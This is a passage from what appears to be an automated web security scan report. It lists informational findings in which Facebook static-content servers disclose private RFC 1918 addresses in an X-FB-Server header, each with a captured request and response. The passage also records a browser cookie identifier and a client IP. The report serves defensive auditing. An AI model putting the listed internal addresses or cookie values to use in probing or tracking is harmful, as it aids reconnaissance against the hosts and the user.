Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df163c489c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff7024fb3%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Jun 2011 01:07:24 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 01:51:48 GMT
X-FB-Server: 10.138.16.183
Content-Length: 54939
Vary: Accept-Encoding
Cache-Control: public, max-age=31375214
Expires: Wed, 13 Jun 2012 15:30:13 GMT
Date: Thu, 16 Jun 2011 12:09:59 GMT
Connection: close

/*1308065392,176820407*/

if (window.CavalryLogger) { CavalryLogger.start_js(["qEipN"]); }

WindowComm={_callbacks:{},makeHandler:function(a,c){c=c||'opener';var b='f'+(Math.random()*(1<<30)).toString
...[SNIP]...

19.377. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/EMbN9YbXDOI.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yN/r/EMbN9YbXDOI.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.183

Request

GET /rsrc.php/v1/yN/r/EMbN9YbXDOI.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
Cache-Control: max-age=0
If-Modified-Since: Fri, 10 Jun 2011 21:38:24 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 01:55:00 GMT
X-FB-Server: 10.138.16.183
Content-Length: 61466
Vary: Accept-Encoding
Cache-Control: public, max-age=31241102
Expires: Tue, 12 Jun 2012 02:25:19 GMT
Date: Thu, 16 Jun 2011 12:20:17 GMT
Connection: close

/*1307931966,176820407*/

if (window.CavalryLogger) { CavalryLogger.start_js(["OMLzc"]); }

WidgetArbiter={_findSiblings:function(){if(WidgetArbiter._siblings)return;WidgetArbiter._siblings=[];for(var
...[SNIP]...

19.378. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/EMbN9YbXDOI.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yN/r/EMbN9YbXDOI.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.199

Request

GET /rsrc.php/v1/yN/r/EMbN9YbXDOI.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 10 Jun 2011 21:38:24 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Content-Length: 61466
Vary: Accept-Encoding
Cache-Control: public, max-age=31244321
Expires: Tue, 12 Jun 2012 02:21:02 GMT
Date: Thu, 16 Jun 2011 11:22:21 GMT
Connection: close

/*1307931737,169775815*/

if (window.CavalryLogger) { CavalryLogger.start_js(["OMLzc"]); }

WidgetArbiter={_findSiblings:function(){if(WidgetArbiter._siblings)return;WidgetArbiter._siblings=[];for(var
...[SNIP]...

19.379. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/IqATM6kdESm.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yW/r/IqATM6kdESm.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.195

Request

GET /rsrc.php/v1/yW/r/IqATM6kdESm.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1351d47b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 20:31:09 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 37540
Vary: Accept-Encoding
Cache-Control: public, max-age=31460630
Expires: Thu, 14 Jun 2012 21:15:46 GMT
Date: Thu, 16 Jun 2011 18:11:56 GMT
Connection: close

/*1308172533,169775811*/

body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embe
...[SNIP]...

19.380. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ya/r/l3KbrDcjIMH.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/ya/r/l3KbrDcjIMH.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 20:30:44 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 26720
Vary: Accept-Encoding
Cache-Control: public, max-age=31311843
Expires: Tue, 12 Jun 2012 21:06:23 GMT
Date: Thu, 16 Jun 2011 11:22:20 GMT
Connection: close

/*1307999114,169776065*/

.fbDarkWidget .fan_box{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background:white}
.fan_box .full_widget .connect_top
...[SNIP]...

19.381. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/rtDNAXiTAA6.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ye/r/rtDNAXiTAA6.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.194

Request

GET /rsrc.php/v1/ye/r/rtDNAXiTAA6.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27bfac8d%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Fvideo%2Fhow-to-include-your-pet-in-your-wedding-party%2F8DE80DF5-6EA8-4B36-B310-BCA4427CCA14.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 20:30:27 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 33265
Vary: Accept-Encoding
Cache-Control: public, max-age=31485127
Expires: Thu, 14 Jun 2012 21:14:39 GMT
Date: Thu, 16 Jun 2011 11:22:32 GMT
Connection: close

/*1308172525,169776066*/

form{margin:0;padding:0}
label{cursor:pointer;color:#666;font-weight:bold;vertical-align:middle}
label input{font-weight:normal}
textarea,.inputtext,.inputpassword{border:1px
...[SNIP]...

19.382. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yf/r/ZJFvhBcInvq.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.146.196

Request

GET /rsrc.php/v1/yf/r/ZJFvhBcInvq.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 10 Jun 2011 17:39:22 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Content-Length: 37396
Vary: Accept-Encoding
Cache-Control: public, max-age=31244482
Expires: Tue, 12 Jun 2012 02:23:42 GMT
Date: Thu, 16 Jun 2011 11:22:20 GMT
Connection: close

/*1307931839,169775812*/

if (window.CavalryLogger) { CavalryLogger.start_js(["AcZ9A"]); }

if(!window.skipDomainLower&&navigator&&navigator.userAgent&&document.domain.toLowerCase().match(/(^|\.)faceb
...[SNIP]...

19.383. http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/58rT2Q2u2Tj.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yg/r/58rT2Q2u2Tj.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/yg/r/58rT2Q2u2Tj.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1351d47b4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3a2a76b2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 15 Jun 2011 20:27:10 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Content-Length: 177476
Vary: Accept-Encoding
Cache-Control: public, max-age=31460623
Expires: Thu, 14 Jun 2012 21:15:39 GMT
Date: Thu, 16 Jun 2011 18:11:56 GMT
Connection: close

/*1308172520,169776320*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

19.384. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/iTSK7icHWCE.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ys/r/iTSK7icHWCE.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.195

Request

GET /rsrc.php/v1/ys/r/iTSK7icHWCE.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33a924acc%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff25ccc10d%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Ffacebook.com%2FWSJ&layout=button_count&locale=en_US&node_type=link&ref=WSJ_homepage&sdk=joey&send=false&show_faces=false&width=90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sat, 26 Feb 2011 21:54:07 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 747
Cache-Control: public, max-age=31287092
Expires: Tue, 12 Jun 2012 14:14:04 GMT
Date: Thu, 16 Jun 2011 11:22:32 GMT
Connection: close

/*1307974440,169775555*/

if (window.CavalryLogger) { CavalryLogger.start_js(["NJtdf"]); }

onloadRegister(function(){copy_properties(AsyncRequest.prototype,{setNectarModuleData:function(c){if(this.me
...[SNIP]...

19.385. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/iTSK7icHWCE.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ys/r/iTSK7icHWCE.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.64.186

Request

GET /rsrc.php/v1/ys/r/iTSK7icHWCE.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ec8d2c74%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2517c53d%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
Cache-Control: max-age=0
If-Modified-Since: Sat, 26 Feb 2011 21:54:07 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 02 Mar 2011 19:32:36 GMT
X-FB-Server: 10.138.64.186
Vary: Accept-Encoding
Content-Length: 747
Cache-Control: public, max-age=31291811
Expires: Tue, 12 Jun 2012 16:30:31 GMT
Date: Thu, 16 Jun 2011 12:20:20 GMT
Connection: close

/*1307982690,176832698*/

if (window.CavalryLogger) { CavalryLogger.start_js(["NJtdf"]); }

onloadRegister(function(){copy_properties(AsyncRequest.prototype,{setNectarModuleData:function(c){if(this.me
...[SNIP]...

19.386. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yt/r/GfxPxxjOIDF.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.147.193

Request

GET /rsrc.php/v1/yt/r/GfxPxxjOIDF.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 15 Jun 2011 02:10:35 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Content-Length: 50933
Vary: Accept-Encoding
Cache-Control: public, max-age=31416972
Expires: Thu, 14 Jun 2012 02:18:32 GMT
Date: Thu, 16 Jun 2011 11:22:20 GMT
Connection: close

/*1308104350,169776065*/

button.async_saving .default_message,
a.async_saving .default_message,
form.async_saving .default_message,
.saving_message{display:none}
.default_message,
button.async_saving
...[SNIP]...

19.387. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/vX9_1hezWgO.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/yy/r/vX9_1hezWgO.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.182

Request

GET /rsrc.php/v1/yy/r/vX9_1hezWgO.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 15 Jun 2011 20:26:28 GMT
X-FB-Server: 10.138.16.182
Content-Length: 103212
Vary: Accept-Encoding
Cache-Control: public, max-age=31483477
Expires: Thu, 14 Jun 2012 20:46:58 GMT
Date: Thu, 16 Jun 2011 11:22:21 GMT
Connection: close

/*1308170795,176820406*/

if (window.CavalryLogger) { CavalryLogger.start_js(["EaBkl"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...

19.388. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zF/r/p13yZ069LVL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.145.198

Request

GET /rsrc.php/v1/zF/r/p13yZ069LVL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 792
Content-Type: image/png
Last-Modified: Tue, 07 Jun 2011 17:59:39 GMT
X-FB-Server: 10.30.145.198
X-Cnection: close
Cache-Control: public, max-age=31244693
Expires: Tue, 12 Jun 2012 02:27:14 GMT
Date: Thu, 16 Jun 2011 11:22:21 GMT
Connection: close

.PNG
.
...IHDR.......0.............sRGB.........bKGD............. pHYs.................tIME.....03a2....."tEXtComment.Created with GIMP on a Mac..wC...jIDATx^..QM.Q.D...v4.......k....lW..s...>.>...
...[SNIP]...

19.389. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/zF/r/p13yZ069LVL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.16.184

Request

GET /rsrc.php/v1/zF/r/p13yZ069LVL.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
Cache-Control: max-age=0
If-Modified-Since: Tue, 07 Jun 2011 17:59:39 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 792
Content-Type: image/png
Last-Modified: Mon, 13 Jun 2011 01:37:31 GMT
X-FB-Server: 10.138.16.184
Cache-Control: public, max-age=31242427
Expires: Tue, 12 Jun 2012 02:31:48 GMT
Date: Thu, 16 Jun 2011 12:04:41 GMT
Connection: close

.PNG
.
...IHDR.......0.............sRGB.........bKGD............. pHYs.................tIME.....03a2....."tEXtComment.Created with GIMP on a Mac..wC...jIDATx^..QM.Q.D...v4.......k....lW..s...>.>...
...[SNIP]...

19.390. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ze/r/nZW4C56WJb6.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.30.148.192

Request

GET /rsrc.php/v1/ze/r/nZW4C56WJb6.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
Cache-Control: max-age=0
If-Modified-Since: Mon, 15 Mar 2010 07:54:13 -0700
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1249
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:54:13 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.192
X-Cnection: close
Cache-Control: public, max-age=23511030
Expires: Wed, 14 Mar 2012 14:55:11 GMT
Date: Thu, 16 Jun 2011 12:04:41 GMT
Connection: close

.PNG
.
...IHDR...F...#........_....PLTE......---,,,.........///DDDddd***............)))...eee...999.........+++:::.........cccXXX......fffbbbEEE___......ggg222...(((...888000...111UUU...444......WWW
...[SNIP]...

19.391. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.ak.fbcdn.net
Path:	/rsrc.php/v1/ze/r/nZW4C56WJb6.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.138.17.186

Request

Response

HTTP/1.1 200 OK
Content-Length: 1249
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:53:15 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.17.186
Cache-Control: public, max-age=23510596
Expires: Wed, 14 Mar 2012 14:53:11 GMT
Date: Thu, 16 Jun 2011 12:09:55 GMT
Connection: close

.PNG
.
...IHDR...F...#........_....PLTE......---,,,.........///DDDddd***............)))...eee...999.........+++:::.........cccXXX......fffbbbEEE___......ggg222...(((...888000...111UUU...444......WWW
...[SNIP]...

19.392. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.217.48

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check4%22%3A0%2C%22check6%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1276%2C%22baseline_elapsed%22%3A1276%7D&asyncSignal=2250 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b6c243ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.54.217.48
X-Cnection: close
Date: Thu, 16 Jun 2011 15:10:55 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.393. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.36.108

Request

GET /common/scribe_endpoint.php?c=v6check&m=%7B%22address%22%3A%22173.193.214.243%22%2C%22version%22%3A4%2C%22variant%22%3Anull%2C%22w%22%3A%7B%22check6%22%3A0%2C%22check4%22%3A0%7D%2C%22to%22%3Afalse%2C%22elapsed%22%3A1480%2C%22baseline_elapsed%22%3A1508%7D&asyncSignal=6937 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Length: 67
Content-Type: image/png
X-FB-Server: 10.136.36.108
X-Cnection: close
Date: Thu, 16 Jun 2011 13:27:33 GMT

.PNG
.
...IHDR....................
IDATx.c.......
-.....IEND.B`.

19.394. http://www.facebook.com/common/scribe_endpoint.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/common/scribe_endpoint.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.60.35

Request

